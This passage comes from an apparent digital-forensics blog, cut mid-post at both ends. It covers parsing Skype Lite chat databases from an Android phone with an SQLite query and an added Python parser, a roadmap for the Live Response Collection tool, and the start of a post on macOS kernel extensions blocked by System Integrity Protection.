<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXZFV-TnO2_QWitPqAiY76jEhd5uWSxiYq9-i-uc46lYmr2YYCClB0R8Lb-lP19TyapoUo5Pxw03g-Ko2Mlexjlnft6-MXT0VO0HYCF8hxsFRooUPl8hBZSMsCE8S2f_bB7cWlUKligdb9/s1600/UpdatadMaindb.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="819" data-original-width="1600" height="326" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXZFV-TnO2_QWitPqAiY76jEhd5uWSxiYq9-i-uc46lYmr2YYCClB0R8Lb-lP19TyapoUo5Pxw03g-Ko2Mlexjlnft6-MXT0VO0HYCF8hxsFRooUPl8hBZSMsCE8S2f_bB7cWlUKligdb9/s640/UpdatadMaindb.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Contents of "main.db". Notice the lack of data in the tables</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span><span style="font-size: large;">There is a "databases" folder though, so naturally the next step was to look there. Sure enough, this contained what looks like the database(s) we are looking for.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-47xVXiGSTbj2jlFMsul2Ijhcm4vKwg9tKBY2bfnFBa5Eh0nOJiui4C0N1Ft6Rs0xoCwgh8bkbIyzFqkE4QjCP7P2aZ8a6FwwYbANAcDWd-oPJW9Ezxp_vecyGe8AhsqoiZZbGmzOzuVG/s1600/NewDatabases.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="680" data-original-width="1186" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-47xVXiGSTbj2jlFMsul2Ijhcm4vKwg9tKBY2bfnFBa5Eh0nOJiui4C0N1Ft6Rs0xoCwgh8bkbIyzFqkE4QjCP7P2aZ8a6FwwYbANAcDWd-oPJW9Ezxp_vecyGe8AhsqoiZZbGmzOzuVG/s640/NewDatabases.JPG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="font-size: 12.8px;"><i><span style="font-size: small;">The "new" contents of the "databases" folder</span></i></td></tr>
</tbody></table>
<span style="font-size: large;">Naturally I was drawn to the "live:iamsarahthompson1990.db" database, as the other two databases have fairly mundane names, plus the file size was considerably larger. </span><span style="font-size: large;"><br /><br /><br /><b>Chapter 3: Parsing the data</b></span><br />
<br />
<span style="font-size: large;">Now that I had identified my database, it was a question of figuring out which table was going to contain what I was looking for. Fortunately most of the tables follow an easy-to-recognize naming convention, so I focused my efforts on the "chatItem" table.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhk2pWhVHmypsPlLeGQLIKtREW6iTHmOAVZ9DWi5qViuDWm1jHmALboXS14AwdZUjUGHYPoOWiM_iLxXOadSTCe5QWdWuUBdV5klNUo9ybCXSm7Q4zldqRM0440mvAhyphenhyphentZ2xCcHyXhxTrS/s1600/chatItemdb.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto; text-align: center;"><img border="0" data-original-height="792" data-original-width="1600" height="316" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhk2pWhVHmypsPlLeGQLIKtREW6iTHmOAVZ9DWi5qViuDWm1jHmALboXS14AwdZUjUGHYPoOWiM_iLxXOadSTCe5QWdWuUBdV5klNUo9ybCXSm7Q4zldqRM0440mvAhyphenhyphentZ2xCcHyXhxTrS/s640/chatItemdb.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">The table "chatItem" from the user database</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;"><br />I need to do some more testing on what the flags actually mean, but for now this particular SQLite query should work quite well if you also come across this layout (please keep reading though, as there are caveats on WHEN to use this query).</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><i>SELECT DATETIME(chatItem.time / 1000, 'unixepoch') AS "Date/Time (UTC)", person_id AS "Sender", content AS "Message", CASE type WHEN 9 THEN 'Received' WHEN 10 THEN 'Sent' WHEN 12 THEN 'Multimedia Sent' WHEN 1 THEN 'Unknown' END AS "Type", status AS "Status", CASE deleted WHEN 1 THEN 'Yes' WHEN 0 THEN '' END AS "Deleted", edited AS "Edited", retry AS "Retry", file_name AS "Multimedia File Name", device_gallery_path AS "Multimedia Path On Device" FROM chatItem</i></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Once you run the above SQLite query, you end up with nicely formatted output that is easy to read, like this (the output was pasted from SQLiteSpy into a TSV file, then opened and formatted in Excel).</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTpTnfVAfpSB6849Wj4tWDa-942sElxyd5kweda4HHBpRzT_yRmvL8RkRg5Eb27W5KpNhXt1X-SSnR5fZ5pEiSaLDxC54Grgi8Q6JPsJi6xwdQtmXcCFFnw1BGFYtSKl_Pe5yloFusIm96/s1600/RefinedSkypeChats.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="561" data-original-width="1600" height="224" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTpTnfVAfpSB6849Wj4tWDa-942sElxyd5kweda4HHBpRzT_yRmvL8RkRg5Eb27W5KpNhXt1X-SSnR5fZ5pEiSaLDxC54Grgi8Q6JPsJi6xwdQtmXcCFFnw1BGFYtSKl_Pe5yloFusIm96/s640/RefinedSkypeChats.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Cleaned up Skype chats</span></i></td></tr>
</tbody></table>
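<span style="font-size: large;">As an added example (not code from the original post), the script below wraps the query above in a small Python parser: it first checks that the database actually carries the Skype Lite "chatItem" table (so it is not run against a traditional main.db by mistake), then decodes the type and deleted flags exactly as the query does. The column names come from the query; the sample rows are constructed test data, and the type-code meanings are the ones given above, which still need more testing.</span>

```python
"""Parse the chatItem table of a Skype Lite user database (Android).

Added example, not code from the original post. It wraps the SQLite query
from the post and runs it against a constructed in-memory database whose
columns mirror the ones the query references. Column names are taken from
the post; the sample rows are constructed test data.
"""
import sqlite3

# Type codes as interpreted in the post; anything else is reported as the
# raw integer so an unknown code is never silently mislabelled.
TYPE_LABELS = {9: "Received", 10: "Sent", 12: "Multimedia Sent", 1: "Unknown"}

# Same selection as the post's query; time is stored in milliseconds, so it
# is divided by 1000 before the 'unixepoch' conversion. String literals are
# single-quoted because SQLite treats double quotes as identifiers first.
CHAT_QUERY = """
SELECT DATETIME(chatItem.time / 1000, 'unixepoch') AS "Date/Time (UTC)",
       person_id AS "Sender",
       content AS "Message",
       type, status, deleted, edited, retry,
       file_name AS "Multimedia File Name",
       device_gallery_path AS "Multimedia Path On Device"
FROM chatItem
ORDER BY chatItem.time
"""


def is_skype_lite_db(conn):
    """True when the database has the Skype Lite 'chatItem' table.
    A traditional Skype main.db does not, so the query must not run on it."""
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = 'chatItem'"
    ).fetchone()
    return row is not None


def parse_chat_items(conn):
    """Run the query and return a list of dicts with decoded flags."""
    if not is_skype_lite_db(conn):
        raise ValueError("no chatItem table: not a Skype Lite user database")
    rows = []
    for (ts, sender, message, type_code, status, deleted, edited, retry,
         file_name, gallery_path) in conn.execute(CHAT_QUERY):
        rows.append({
            "timestamp_utc": ts,
            "sender": sender,
            "message": message,
            "type": TYPE_LABELS.get(type_code, f"type {type_code}"),
            "status": status,
            "deleted": deleted == 1,
            "edited": edited,
            "retry": retry,
            "file_name": file_name,
            "device_gallery_path": gallery_path,
        })
    return rows


def build_sample_db():
    """Constructed Skype Lite style database for demonstration (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("""
        CREATE TABLE chatItem (
            time INTEGER, person_id TEXT, content TEXT, type INTEGER,
            status INTEGER, deleted INTEGER, edited INTEGER, retry INTEGER,
            file_name TEXT, device_gallery_path TEXT)
    """)
    # 1543334400000 ms == 2018-11-27 16:00:00 UTC; later rows are one minute apart.
    conn.executemany("INSERT INTO chatItem VALUES (?,?,?,?,?,?,?,?,?,?)", [
        (1543334400000, "live:alice", "hello", 9, 2, 0, 0, 0, None, None),
        (1543334460000, "live:bob", "hi there", 10, 2, 0, 0, 0, None, None),
        (1543334520000, "live:bob", None, 12, 2, 0, 0, 0, "IMG_0001.jpg",
         "/storage/emulated/0/DCIM/Camera/IMG_0001.jpg"),
        (1543334580000, "live:alice", "oops", 9, 2, 1, 0, 0, None, None),
    ])
    conn.commit()
    return conn


def build_traditional_main_db():
    """Constructed stand-in for a traditional Skype main.db (different schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Messages (id INTEGER, body_xml TEXT)")
    return conn


if __name__ == "__main__":
    # To run against a real extraction: sqlite3.connect("file:live_user.db?mode=ro", uri=True)
    for row in parse_chat_items(build_sample_db()):
        print(row)
```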
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><b>Chapter 4: What the heck is going on here??</b></span><br />
<br />
<span style="font-size: large;">After much discussion on exactly "what" was happening here with Jessica, it turns out that it is actually a couple of things that all combined to have the data stored like this.</span><br />
<br style="font-size: x-large;" />
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: large;">First of all, remember the model number that I listed? Well, this is the Global version of the Galaxy S6 Edge. That means that some apps are pre-bundled, and in this case Microsoft apps (including Skype) were included by default. After I updated the app to what looked like the latest version on the Play Store, I did my data pull (I chose to do this, rather than pull from APK Mirror, because I wanted to see if the latest app version was supported with my tools). However, one important caveat to note, is that this device is running Android 5.1.1 (because it is super easy to root an older version of Android and get a full image of the device, which is what is needed for the data analysis portion of the Cyber Sleuth workshop). Android 5 currently accounts for almost 18% of all Android devices on the market (kinda surprising, I know). </span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0u3aAlgSEoLYYG3JDxbPKkNnZLMG9rpYSewOkDB85DV-mhLeMbbDj0UWhmhVX8Se1MpZI_BcoLlBv72pjtYXFMLzQiv6-_Iqgphf3hJnwzjuh5K0oT8NUgrMQlBk7pFrUKka5NRjD-JqR/s1600/Screen+Shot+2018-11-27+at+3.28.40+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="601" data-original-width="880" height="436" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0u3aAlgSEoLYYG3JDxbPKkNnZLMG9rpYSewOkDB85DV-mhLeMbbDj0UWhmhVX8Se1MpZI_BcoLlBv72pjtYXFMLzQiv6-_Iqgphf3hJnwzjuh5K0oT8NUgrMQlBk7pFrUKka5NRjD-JqR/s640/Screen+Shot+2018-11-27+at+3.28.40+PM.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Android market saturation as of October 26, 2018, retrieved on November 27, 2018 from <a href="https://developer.android.com/about/dashboards/">https://developer.android.com/about/dashboards/</a></span></i></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-size: large; text-align: start;">The issue here is that although, according to the Google Play Store, I was updating to the latest version of Skype, in reality it was installing "Skype Lite", because the "new" versions of Skype are not compatible with older Android versions (by default the SM-G925F (told you that you would see it again) ships with Android 5). This happened even though, as you can clearly see from the screenshots, the Google Play Store was telling me that "Skype" was indeed installed, and "Skype Lite" was not. </span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfgQhU3RODd7I9YvzZ5CCusq5ppr7gnXQH56Z3amjHaz4Vm5frV5tPPNAZqyQgQp2QNAJqIffXNOPub19hhPIJ2yaONm68TSlwJ-7hgL-cIMr-_Bs3wmvoedBpnJSk_d3xZeOVzJ-p4PHk/s1600/Screenshot_2018-11-27-15-51-11.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1600" data-original-width="900" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfgQhU3RODd7I9YvzZ5CCusq5ppr7gnXQH56Z3amjHaz4Vm5frV5tPPNAZqyQgQp2QNAJqIffXNOPub19hhPIJ2yaONm68TSlwJ-7hgL-cIMr-_Bs3wmvoedBpnJSk_d3xZeOVzJ-p4PHk/s640/Screenshot_2018-11-27-15-51-11.png" width="360" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">"Skype" application information from the S6 Edge</span></i></td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMnutF1z2lFkKezkOZ8cWWrjEV94f7eQdjHkd9Nrm1v9mRxomRmxgbUWrmreb94PeYooOIK1sSF-tH-zJan52MpUAFGAh4o8Fjix2MkGpA4cQn7W3_NWYgiXnYDagjbdDj9lZzb0lCL_aA/s1600/Screenshot_2018-11-27-15-51-27.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1600" data-original-width="900" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMnutF1z2lFkKezkOZ8cWWrjEV94f7eQdjHkd9Nrm1v9mRxomRmxgbUWrmreb94PeYooOIK1sSF-tH-zJan52MpUAFGAh4o8Fjix2MkGpA4cQn7W3_NWYgiXnYDagjbdDj9lZzb0lCL_aA/s640/Screenshot_2018-11-27-15-51-27.png" width="360" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">According to this, Skype is installed</span></i></td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjy0biBGqYHD8DDd_U8cjwcHV92ENTlDBrpdmwg7JjhV_YBE_0X_hUU3Jc0D3V0pJMMNwiROQWC8PWj1uZpuoZRwE9ozIGMBU6aLdm5QZoiuitFcCe4_jEX4q-lRQ6BHtve9x9g4IMSWseN/s1600/Screenshot_2018-11-27-15-51-43.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1600" data-original-width="900" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjy0biBGqYHD8DDd_U8cjwcHV92ENTlDBrpdmwg7JjhV_YBE_0X_hUU3Jc0D3V0pJMMNwiROQWC8PWj1uZpuoZRwE9ozIGMBU6aLdm5QZoiuitFcCe4_jEX4q-lRQ6BHtve9x9g4IMSWseN/s640/Screenshot_2018-11-27-15-51-43.png" width="360" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">This screen suggests that "Skype Lite" is a different application</span></i></td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilz4UcPFDZN9Rb8Dv8B_6jCw9ias_hdb-zSLbdhBr0a6pDtJ2OedLP73kajA2LdAaXKDiGaFkksx26M6Hp-gct5bMDnS7JaeAyntVY-zVb5sM5q2k4tGJkGK6gL8TA0EmjqHNU0Ml_Qo2U/s1600/Screenshot_2018-11-27-15-51-51.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1600" data-original-width="900" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilz4UcPFDZN9Rb8Dv8B_6jCw9ias_hdb-zSLbdhBr0a6pDtJ2OedLP73kajA2LdAaXKDiGaFkksx26M6Hp-gct5bMDnS7JaeAyntVY-zVb5sM5q2k4tGJkGK6gL8TA0EmjqHNU0Ml_Qo2U/s640/Screenshot_2018-11-27-15-51-51.png" width="360" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">This confirms that, according to the Play Store, "Skype Lite" is indeed a different application on my Galaxy S6 Edge running Android 5.1.1</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><b>Chapter 5: Whew. No changes. But support is needed</b></span><br />
<br />
<span style="font-size: large;">As you may have guessed, Skype Lite actually stores data in a different fashion than traditional Skype itself. Most of the tools on the market today are set to handle Skype data, but not Skype Lite. This is the reason that AXIOM did not detect Skype data: it does not (yet) have support for Skype Lite, only for Skype itself. And although it was initially suspected, Skype itself did not undergo a drastic change; it was just a combination of things that resulted in Android/Google Play/Skype doing something that was totally unexpected, because of the base installation of Android that was running. <br /><br /><u>NOTE: </u>If I was running Android 6 or later on the device, the aforementioned tools should parse the data, but we will have to hold onto that thought for testing for another day :)</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><b>Chapter 6: The Grand Finale</b></span><br />
<br />
<span style="font-size: large;">If you made it all the way down here, congratulations for sticking with this adventure. It has definitely been a fun one! </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Always remember that, at the end of the day, tools are just tools, and they have limitations and shortcomings. In a perfect world every tool could handle all the data from every application from every device. But we all know that is not going to happen. Don't be afraid to dig into the data itself, because you might find that an entire data structure is not being parsed properly. Or that the formats have changed. Or, you may find through a series of events that your device is running a different application, with a different storage structure, than what the device is "telling" you is really running!</span><br />
<span style="font-size: large;"><br /></span>Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.com0tag:blogger.com,1999:blog-1547389155659419533.post-51631273624991527642018-08-08T16:15:00.001-04:002018-08-08T16:15:59.737-04:00Live Response Collection Development Roadmap for 2018<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Hello again readers and welcome back! It's been a little while ...OK, a long while... since I've made updates to the Live Response Collection. Rest assured for those of you who have used, and continue to use it, that I am still working on it, and trying to keep it as updated as possible. For the most part it has far exceeded my expectations and I have heard so much great feedback about how much easier it made data collections that users and/or businesses were tasked with. The next version of the LRC will be called Cedarpelta, and I am hoping for the release to take place by the end of this year.</span><br />
<span style="font-size: medium;"><span style="font-size: medium;"><br /></span>
<span style="font-size: large;"><br />
As most Mac users have likely experienced by now, not only has Apple implemented macOS, they have also changed the file system from HFS+ to APFS. Because the Live Response Collection interacts with the live file system, this really does not affect the data collection aspects of the LRC. It DOES, however, affect third party programs running on a Mac, <a href="https://www.brimorlabsblog.com/2018/07/lets-talk-about-kext.html" target="_blank">as detailed in my previous blog post.</a> <br /><br /><br />Although the new operating system updates limit what we can collect leveraging third party tools, there are a plethora of new artifacts and data locations of interest. To ensure the LRC is collecting data points of particular interest, I've been working with the most knowledgeable Apple expert that I (and probably a large majority of readers) know, Sarah Edwards (<a href="https://twitter.com/iamevltwin" rel="nofollow" target="_blank">@iamevltwin</a> and/or <a href="https://www.mac4n6.com/" rel="nofollow" target="_blank">mac4n6.com</a>). As a result of this collaboration, one of the primary features of the next release of the LRC will be much more comprehensive collections from a Mac!</span></span><br />
<span style="font-size: large;"><br />
<br />For the vast majority of you who use the Windows version of the Live Response Collection, don't fret, because there will be updates in Cedarpelta for Windows as well! These will primarily focus on Windows 10 files of interest, but also will include some additional functionality for some of the existing third-party tools that it leverages, like <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns" target="_blank">autoruns</a>.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo27xxahpUGLLOovpiO_Qgv3a6fMKltwJ0CMRLRay62vwGrj_XPo-rBOfGGG45RMpsxsZZpl6x8mUtH2_Era0oAQtLs38jaJAkAPX4KS0zkjhv8tWH4gtyfUV36dwPgkEfPvnYVA54ORXU/s1600/Screenshot+2018-08-08+at+15.02.38.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="323" data-original-width="655" height="314" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo27xxahpUGLLOovpiO_Qgv3a6fMKltwJ0CMRLRay62vwGrj_XPo-rBOfGGG45RMpsxsZZpl6x8mUtH2_Era0oAQtLs38jaJAkAPX4KS0zkjhv8tWH4gtyfUV36dwPgkEfPvnYVA54ORXU/s640/Screenshot+2018-08-08+at+15.02.38.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Autoruns 13.90 caused an issue, and was fixed very quickly once the issue was reported (thanks to <a href="https://twitter.com/KyleHanslovan" target="_blank">@KyleHanslovan</a>)</i></span></td></tr>
</tbody></table>
<br />
<span style="font-size: large;"><br />As always, if there are any additional features that you would like to see the LRC perform, please reach out to me, through Twitter (</span><span style="font-size: medium;"><span style="font-size: large;"><a href="https://twitter.com/brimorlabs">@brimorlabs</a> or <a href="https://twitter.com/brianjmoran">@brianjmoran</a>) or the contact form on my website (<a href="https://www.brimorlabs.com/contact/">https://www.brimorlabs.com/contact/</a>) or even by leaving a comment on the blog. I will do my best to implement them, but remember, the LRC was developed in a way that allows users to create their own data processing modules, so if you have developed a module that you regularly use, and you would like to (and have the authority to) share it, please do, as it will undoubtedly help other members of the community as well!</span></span><br />
<span style="font-size: large;"><br /></span>
<br />
<span style="font-size: large;"><br /></span><span style="font-size: large;"><br /></span>Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.com0tag:blogger.com,1999:blog-1547389155659419533.post-12693874475164521242018-07-17T08:49:00.003-04:002018-07-17T08:49:37.193-04:00Let's Talk About Kext<br />
<span style="font-size: large;">Hello again readers and welcome back! Today's blog post is going to cover some of the interesting things I found poking around MacOS while developing updates to the Live Response Collection. First off, I have to offer my thanks to <a href="https://twitter.com/iamevltwin">Sarah Edwards</a> for taking the time to talk about what she has done with regards to the quirkiness ("official technical term") regarding MacOS, System Integrity Protection ("SIP"), kernel extensions, and everything else that completely derailed my plans for pulling data from a Mac!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br />Our story begins by trying to diagnose some errors that I noticed while trying to perform a memory dump on my system using osxpmem. The errors were related to my system loading the kernel extension MacPmem.kext, which resulted in the error message "<i style="background-color: #eeeeee;">/Users/brimorlabs/Desktop/Cedarpelta-DEV/OSX_Live_Response/Tools/osxpmem_2.1/temp/osxpmem.app/MacPmem.kext failed to load - (libkern/kext) system policy prevents loading; check the system/kernel logs for errors or try kextutil(8).</i></span><span style="font-size: large;">". Even though I was running the script as root, for some reason the kext was failing to load. </span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUdQavD82hq1G3dmPUB6XrR1WUr8j-L57031iv0fdTZZJtqaK1PX0MYFdZ4Xl3YGwLmotnJKj8vLglLoR_1tB_RJ8sspuR8t6rRkReXrOhlkS1_nfqPK9JBhDHqgcOLfKL-eqQ9sLIF51r/s1600/Screen+Shot+2018-07-13+at+10.31.08+AM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="538" data-original-width="1516" height="226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUdQavD82hq1G3dmPUB6XrR1WUr8j-L57031iv0fdTZZJtqaK1PX0MYFdZ4Xl3YGwLmotnJKj8vLglLoR_1tB_RJ8sspuR8t6rRkReXrOhlkS1_nfqPK9JBhDHqgcOLfKL-eqQ9sLIF51r/s640/Screen+Shot+2018-07-13+at+10.31.08+AM.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>That weird error message is weird</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The Live Response Collection script has always changed the owner of the kernel extension, so I knew that ownership was not the problem either, which left me in a bit of a bind. Fortunately the tool "kextutil" is included on a standard Mac load, so I hoped that running that command could shed some light on my issues. The results from running kextutil were mostly underwhelming, with the exception of .... what the heck is that path? </span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs-SHS2_RCqlLHVIjqK5lIgzHMzq8Zrkxz87kCFz-waWiz5zyx9xVw8dtq0tQZqaUzF2iaboRKuPS4Eh6ydSizvHwjmQkMMn6de_NjDp9a7dSMQRE0MMfCZn5fXhzMOeexHE1Jpk5FqdDQ/s1600/Screen+Shot+2018-07-13+at+10.11.09+AM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1038" data-original-width="1456" height="456" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs-SHS2_RCqlLHVIjqK5lIgzHMzq8Zrkxz87kCFz-waWiz5zyx9xVw8dtq0tQZqaUzF2iaboRKuPS4Eh6ydSizvHwjmQkMMn6de_NjDp9a7dSMQRE0MMfCZn5fXhzMOeexHE1Jpk5FqdDQ/s640/Screen+Shot+2018-07-13+at+10.11.09+AM.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Output from kextutil. What is "/Library/StagedExtensions/Users/brimorlabs/Desktop/Cedarpelta-DEV/OSX_Live_Response/Tools/osxpmem_2.1/osxpmem.app/MacPmem.kext" and why are you there, and not the folder you are supposed to be in?</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /><br />The actual path on disk was "</span><span style="background-color: #eeeeee; text-align: center;"><span style="font-size: large;"><i>/Users/brimorlabs/Desktop/Cedarpelta-DEV/OSX_Live_Response/Tools/osxpmem_2.1/osxpmem.app/MacPmem.kext</i></span></span><span style="font-size: large;">", but for some reason the operating system was putting it in another spot. OK, that seems really weird, so why is my system doing stuff that I don't specifically want it to do? Oh Apple, how very Python of you! :)</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9XqW1SEkDneLo1V5MP8oG6677vutbVmvUScgrmAv81kkoFcL8OK-zHIQn6_MPrZQdPBvMm6EqwInteIlJqRK9fNW8SMN89DSPVlccZDc_EiDEFRio24fxMDsuXUPfCqhd4rUZGsYLEHAZ/s1600/Screen+Shot+2018-07-13+at+11.00.04+AM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="342" data-original-width="1562" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9XqW1SEkDneLo1V5MP8oG6677vutbVmvUScgrmAv81kkoFcL8OK-zHIQn6_MPrZQdPBvMm6EqwInteIlJqRK9fNW8SMN89DSPVlccZDc_EiDEFRio24fxMDsuXUPfCqhd4rUZGsYLEHAZ/s640/Screen+Shot+2018-07-13+at+11.00.04+AM.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>osxpmem/MacPmem.kext related files under the "/Library/StagedExtensions" path</i></span></td></tr>
</tbody></table>
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">As it turns out, thanks to quite a bit of research, the "/Library/StagedExtensions" folder is, in very basic terms, the sandbox in which MacOS puts things that it does not trust, as a function of SIP. Now, if you were presented with the "Do you trust this extension" prompt ...</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
